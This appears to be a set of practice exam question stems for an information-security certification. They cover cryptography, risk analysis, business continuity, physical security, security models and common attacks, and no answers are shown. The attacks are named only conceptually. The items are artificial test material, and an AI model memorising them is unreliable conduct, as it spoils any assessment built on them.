Q1. An attack that compromises the information stored in the client machine by web browsers for faster retrieval during subsequent visits is called what?
Q2. Which of the following are risk management processes? (This is a drag-and-drop type of question. Here, and for similar drag-and-drop questions, you can draw a line from the list of answers from the left to the empty box on the right.)
Q3. Primary criterion of a Business continuity planning is to ensure that the scoping is _____.
Q4. What is the algorithm used by the Wi-Fi Protected Access 2 (WPA2) protocol for encryption?
Q5. Measurements help in reducing the frequency and severity of security-related issues. Which one of the following is not a right choice for measurements?
Q6. If an attack uses a combination of brute force and dictionary entries to crack a password, then such an attack is called what?
Q7. Identify from the following list an activity that best describes a management control:
Q8. Brute-forcing of passwords is a
Q9. Which of the following are steps in computer system start up and shut down procedures?
Q10. Which property of a TCP implementation is vulnerable to Denial of Service attacks?
Q11. While identifying security awareness training needs, which of the following are appropriate choices to consider?
Q12. Which one the following types of hacker is most likely to compromise organizations, computer systems to perpetrate a computer crime for financial gain?
Q13. Which one of the following pertaining to lighting is false?
Q14. Which one of the choices is a popular algorithm used in asymmetric key encryption, which is a product of two large prime numbers that derives the key pairs?
Q15. An organization monitors the logon sessions of its employees. As per the legal requirements and the system monitoring policy of the organization, it is mandatory that the employee is informed and reminded from time to time about session monitoring. Select the most appropriate method for implementing such a requirement
Q16. Ping of death is an example of which one of the following?
Q17. In information security, the level of trust or a degree of confidence on computer systems is known as what?
Q18. Common Vulnerabilities and Exposures (CVE) contain the details of published vulnerabilities. These details are called what?
Q19. A time condition in web applications where the state of a resource changes between the time the resource is checked to when it is accessed is called what?
Q20. In public key cryptography, a message is encrypted using the recipient's public key, and the recipient's private key is used to decrypt the message. This process ensures which tenet of information security?
Q21. An attack that redirects a user accessing a legitimate website to an attacker-constructed malicious site without the acceptance or knowledge of the user is known as __________.
Q22. The process of packaging the data packets received from applications is known as encapsulation. What is the term that denotes the output of such a process?
Q23. Which one of the following statements are true?
Q24. In an organization, a surveillance monitor, such as Closed Circuit Television (CCTV), is used in critical areas to monitor the movement of personnel. Which of the following controls is least effective for such a monitoring activity?
Q25. An organization is planning to set up a data center that houses critical business application servers. Which one of the following will be the least important factor to consider for such a facility?
Q26. In cryptography encrypting, a decrypted message results in what?
Q27. Which of the following statements pertaining to the Bell-LaPadula model are appropriate?
Q28. A prominent application of a Fiber Channel Protocol includes which one of the following?
Q29. Which one of the following disaster recovery tests is also called a functional drill?
Q30. A steady interference to electrical power is called Noise. What is the term used for an electrical power interference of a short duration?
Q31. A malicious code that tracks user actions is called___________.
Q32. Which one of the following water sprinkler systems is most appropriate when large volumes of water should be discharged to contain the fire?
Q34. Which of the following are true statements pertaining to information security controls?
Q35. The charge difference between neutral, hot, and ground electrical wires is called what?
Q36. Residual risk is risk that remains after _____.
Q37. In web applications, the lack of a verification mechanism to ensure that the sender of a web request actually intended to do so is exploited by which one of the following attacks?
Q38. An asset is valued at $5,000,000, and it is estimated that a certain threat has an annualized rate of occurrence (ARO) once every three years. The asset has an exposure factor (EF) of 15%. What is the highest amount that a company should spend annually on countermeasures?
Q39. The activities of a logged in user are monitored and updated to an access log file. This process is known as what?
Q40. Providing invalid or out-of-bounds inputs to the database system to obtain either database access or the database content using the native language of the database system constitutes a type of attack known as what?
Q41. Which of the following are threats to physical security?
Q42. A high-rise wall in the physical perimeter is a physical security control. Which one of the following is a false statement for such a control?
Q43. If a periodic port scanning is not performed on the information systems, then there is risk of _________ created by malicious programs.
Q44 Business Continuity Planning life cycle includes the maintenance of plans. Which one of the following choices may not provide necessary inputs for updating the plans pertaining to information security?
Q45. The malicious activity of changing data during the input or processing stage of a software program to obtain a financial gain is known as __________.
Q46. Hiding or showing menus in an application depending on the access permissions of a user is known as what?
Q47. Identify the false statements from the following options pertaining to information security procedures:
Q48. Which one of the following is not an assurance aim of Public Key Infrastructure (PKI)?
Q49. The process of checking and validating the effectiveness of physical security controls is called what?
Q50. Federal Information Processing Standard (FIPS) 140 Security Level 3 does not emphasize which one of the following?
Q51. A law that was developed on the basis of the decisions of courts and tribunals is called __________.
Q52. Which one of the following is a false statement pertaining to the Take-Grant model?
Q53. Providing wrong inputs to the system can be classified as which one of the following?
Q54. The purpose of using Secure Shell (SSH) over TelNet is what?
Q55. In Cryptography, if a corresponding ciphertext to the block of plaintext selected by the analyst is available, then which type of attack is possible?
Q56. When a sender wants to ensure that the message is not altered during transmission, the sender uses a hash function. The hash value is known as what?
Q57. A cryptovariable is a:
Q58. Which one of the following is not a type of sensor used in wave pattern motion detectors?
Q59. An organization has identified risks to its web servers from hacking attacks through the Internet. Which one of the following may not be a correct strategy to mitigate the risks?
Q60. Which of the following is false for Gas discharge fire extinguishing systems?
Q61. While doing risk assessment for physical and environmental security requirements, which of the following security professionals will be taken into consideration?
Q62. Which of the following statement is false pertaining to the RC4 algorithm?
Q63. Which of the following are risk mitigation strategies?
Q64. In digital signature, the process of signing is accomplished by what?
Q65. At what temperature is the valve of wet pipe sprinkling systems designed to open?
Q66. Which one of the following is not a primary objective of the Orange book?
Q67. IEEE 802.11 is set of standards for which type of the following networking technologies?
Q68. Identify the least appropriate method from the following to determine the strength or security of a cryptographic key:
Q69. Which one of the following choices is correct for Annualized Loss Expectancy (ALE)?
Q70. Which one of the following is false pertaining to the Gray-box penetration testing?
Q71. The address pace of Ipv6 is what?
Q72. Identify the correct statements pertaining to the primary purpose of cryptography:
Q73. A cold boot attack is used to retrieve information such as password or encryption keys from DRAM memories even after the power is removed. Which property of the DRAM memories is this attack trying to compromise?
Q74. An exposure factor can be best described as:
Q75. While developing business continuity plans, which one of the following should be considered as the most important requirement?
Q76. Replay attacks are due to improper handling of:
Q77. Sending Unsolicited Commercial Email (UCE) is popularly known as:
Q78. Identify the correct asset classification criteria from the following:
Q79. The turnstile type of fencing should be considered in which of the following situations?
Q80. For the proper operation of computer parts, the ideal humidity range should be 40 to 60%. What type of problem will occur if the humidity is above 60%?
Q81. Threats exploit vulnerabilities through:
Q82. Identify the intellectual property-related terms from the following:
Q83. A strong session management prevents what type of attack?
Q84. Identify the incorrect statements pertaining to security policy:
Q85. Which of the following is not a true choice for the Kerberos implementation?
Q86. Basic Input Output System (BIOS) checks can be used to control access to the system using password protection. This control is called what?
Q87. Which of the following information security models proposes a directed graph?
Q88. When a malicious code that came disguised inside a trusted program gets activated on a particular event or date, then such malicious code is called what?
Q89. An access card that contains integrated circuits and can process information for physical and logical access control is called what?
Q90. Which one of the following is a correct description of a preventative control?
Q91. Which of the following are right considerations while designing a data center?
Q92. An access control model that uses a pair of values that are related to the least upper bound and the greatest lower bound in a model is called what?
Q93. Secret and hidden channels that transmit information to unauthorized entities based on the response time of the system are known as what?
Q94. Secure Sockets Layer (SSL) is a popular protocol that uses cryptographic encryption to protect the communication data. Which type of cipher does this protocol use for such a protection?
Q95. Which one of the following statements pertaining to combustible materials is false?
Q96. The focus of the red book in rainbow series published by the US Department of Defense (DoD) is ___________.
Q97. Which one of the following pertaining to fire-suppression mediums is false?
Q98. Which one of the following methods is most suitable for protecting copyrighted information?
Q99. Which of the following information security models is also known as a State machine model?
Q100. The systematic use of information to identify sources and estimate risk is known as what?
Q101. When you want to ensure that the message you sent can be opened only by the receiver, then you will do what?
Q102. Portable fire extinguishers predominantly use which fire-suppression medium?
Q103. Which of the following choices can be appropriate when an organization needs to resume its critical IT operations in 24 to 48 hours?
Q104. The amount of time or effort required to accomplish an attack is known as what?
Q105. The layer that manages the communication between two computers in the OSI model is called what?
Q106. Fooling an information system to make it trust an entity that has imitated the trusted entity is known as what?
Q107. Which one of the following controls will be most effective to prevent data theft due to data remanence in the storage media?
Q108. Hash value in cryptography is a computed value based on the contents of the message. What is this computed value called?
Q109. If an access to an asset is determined by its owner, then such an access control is termed as what?
Q110. Which one of the following is a service asset?
Q111. Which one of the following is false pertaining to the information owners?
Q112. An organization is doing risk assessment for the Information Technology department. Which one of the following choices would not yield much input for the assessment?
Q113. Which one of the following protocols is most likely to reduce the manual configuration of IP addresses to host computers?
Q114. IPsec is a set of protocols used to secure Internet communications. Which of the following is not a key function of the protocol?
Q115. Randomization vulnerabilities are predominantly concerned with which one of the following?
Q116. Providing personnel identification number (PIN) along with a smart card and swiping a finger constitutes what type of authentication?
Q117. In Cryptography, when a key is authorized for use by legitimate entries for a period of time, then such a period is called what?
Q118. Which one of the following is not true pertaining to Virtual Private Networking (VPN)?
Q119. In the Bell-LaPadula model, which one of the following statements is false?
Q120. Which one of the following is false pertaining to the TCP/IP protocols?
Q121. The concept of least privilege is applicable to what?
Q122. Border Gateway Protocols work in which layer of the TCP/IP model?
Q123. In Public Key Infrastructure, which of the following is not a key management procedure?
Q124. Asymmetric key encryption is also known as what?
Q125. An armed response to an intrusion is called what?
Q126. An organization is planning to conduct information security awareness training programs for its employees. Which one of the following topics should they consider the most important?
Q127. At what stage of penetration testing are vulnerability scanners used?
Q128. The practice of discovering the full content of a DNS zone via successive queries is called what?
Q129. The separation of users and data is an example of which type of assurance?
Q130. In computer crime, the role of computers could be which one of the following?
Q131. Which one of the following is not true for Recovery Time Objectives (RTO) pertaining to Business Continuity Planning?
Q132. The goal of the code of ethics by (ISC) includes which one of the following?
Q133. Which one of the following is a crime committed by way of identity theft?
Q134. Which one of the following attacks does not represent a form of social engineering?
Q135. Key loggers capture the keystrokes of the unsuspicious user. Which one of the following attacks represents a behavior that may be capturing the activity information in the network?
Q136. Which one of the following pertaining to criminal law is not a right choice?
Q137. ___________ is a set of exclusive rights granted to the inventor of new, useful, inventive, and industry-applications:
Q138. Sarbanes-Oxley mandates a number of reforms to which one of the following?
Q139. Which one of the following statements pertaining to communication protocols is false?
Q140. The four upper layers in the OSI model are sometimes referred to as_______.
Q141. Spoofing can also be referred to as:
Q142. Which of the following is not a service provided by Domain name System Security Extensions (DNSSEC)?
Q143. Which one of the following statements pertaining to Dynamic Host Control Protocol (DHCP) is false?
Q144. Path traversal is a type of attack that tries to:
Q145. Which of the following cryptographic standards uses three 56-bit keys?
Q146. Secure Electronic Transaction (SET) is a:
Q147. What is the normal range of a raised floor in a data center?
Q148. A periodical mock test rehearsing the steps of actions to be taken during an emergency is also known what?
Q149. Full disk encryption is used to encrypt the data in laptops. This is done to prevent which type of attack?
Q150. Average time required to repair a device is termed as what?
Q151. A technique to hide information from unauthorized entities is known as what?
Q152. Property states that a subject a given security level may not write to any object at a lower security level. Which security model states this property?
Q153. In Biometrics, identification provided by a person is verified by a process called one-to-one search. This process can be described as what?
Q154. An authority who manages the certificates in a Public Key Infrastructure is known as what?
Q155. Which of the following algorithms are not useful for hashing?
Q156. Kerberos is suitable for preventing what?
Q157. The disposal phase in system development life cycle is concerned with which one of the following?
Q158. In software development, life cycle verification during development and implementation is a process used to check what?
Q159. What is the biggest concern in using a waterfall model for software development?
Q160. Which of the following are core security considerations for secure software development processes?
Q161. From the security perspective, which of the following procedures is most important during software development processes?
Q162. Failure to properly create, store, transmit, or protect passwords is an example of: what?
Q163. Failure of a web application to validate, filter, or encode user input before returning it to another user's web client is known as what?
Q164. Mobile codes are executed in which one of the following?
Q165. Which of the following are common data structure attacks?
Q166. The encryption of data between the client and the server in an Internet web browsing session can be accomplished using what?
Q167. Which one of the following is not a technical control?
Q168. An organization's security initiatives based on policies, procedures, and guidelines; security awareness training; and risk management together define what?
Q169. Which of the following parameters are considered for assets during asset classification and help in devising suitable controls for security protection?
Q170. Which one of the following classifications of information, if compromised could cause certain damage to national security as per governmental classification types?
Q171. While initiating a business continuity planning process, which of the following is first established?
Q172. Business continuity plans should identify which one of the following?
Q173. A call tree in Business Continuity Planning represents which one of the following?
Q174. Which of the following are important for Business Continuity Processes?
Q175. Half-open connections are a vulnerability in what?
Q176. SYN cookies are:
Q177. In client server networking, cookies are:
Q178. The process of sending ECHO_REQUEST using Internet Control Messaging Protocol is popularly known as what?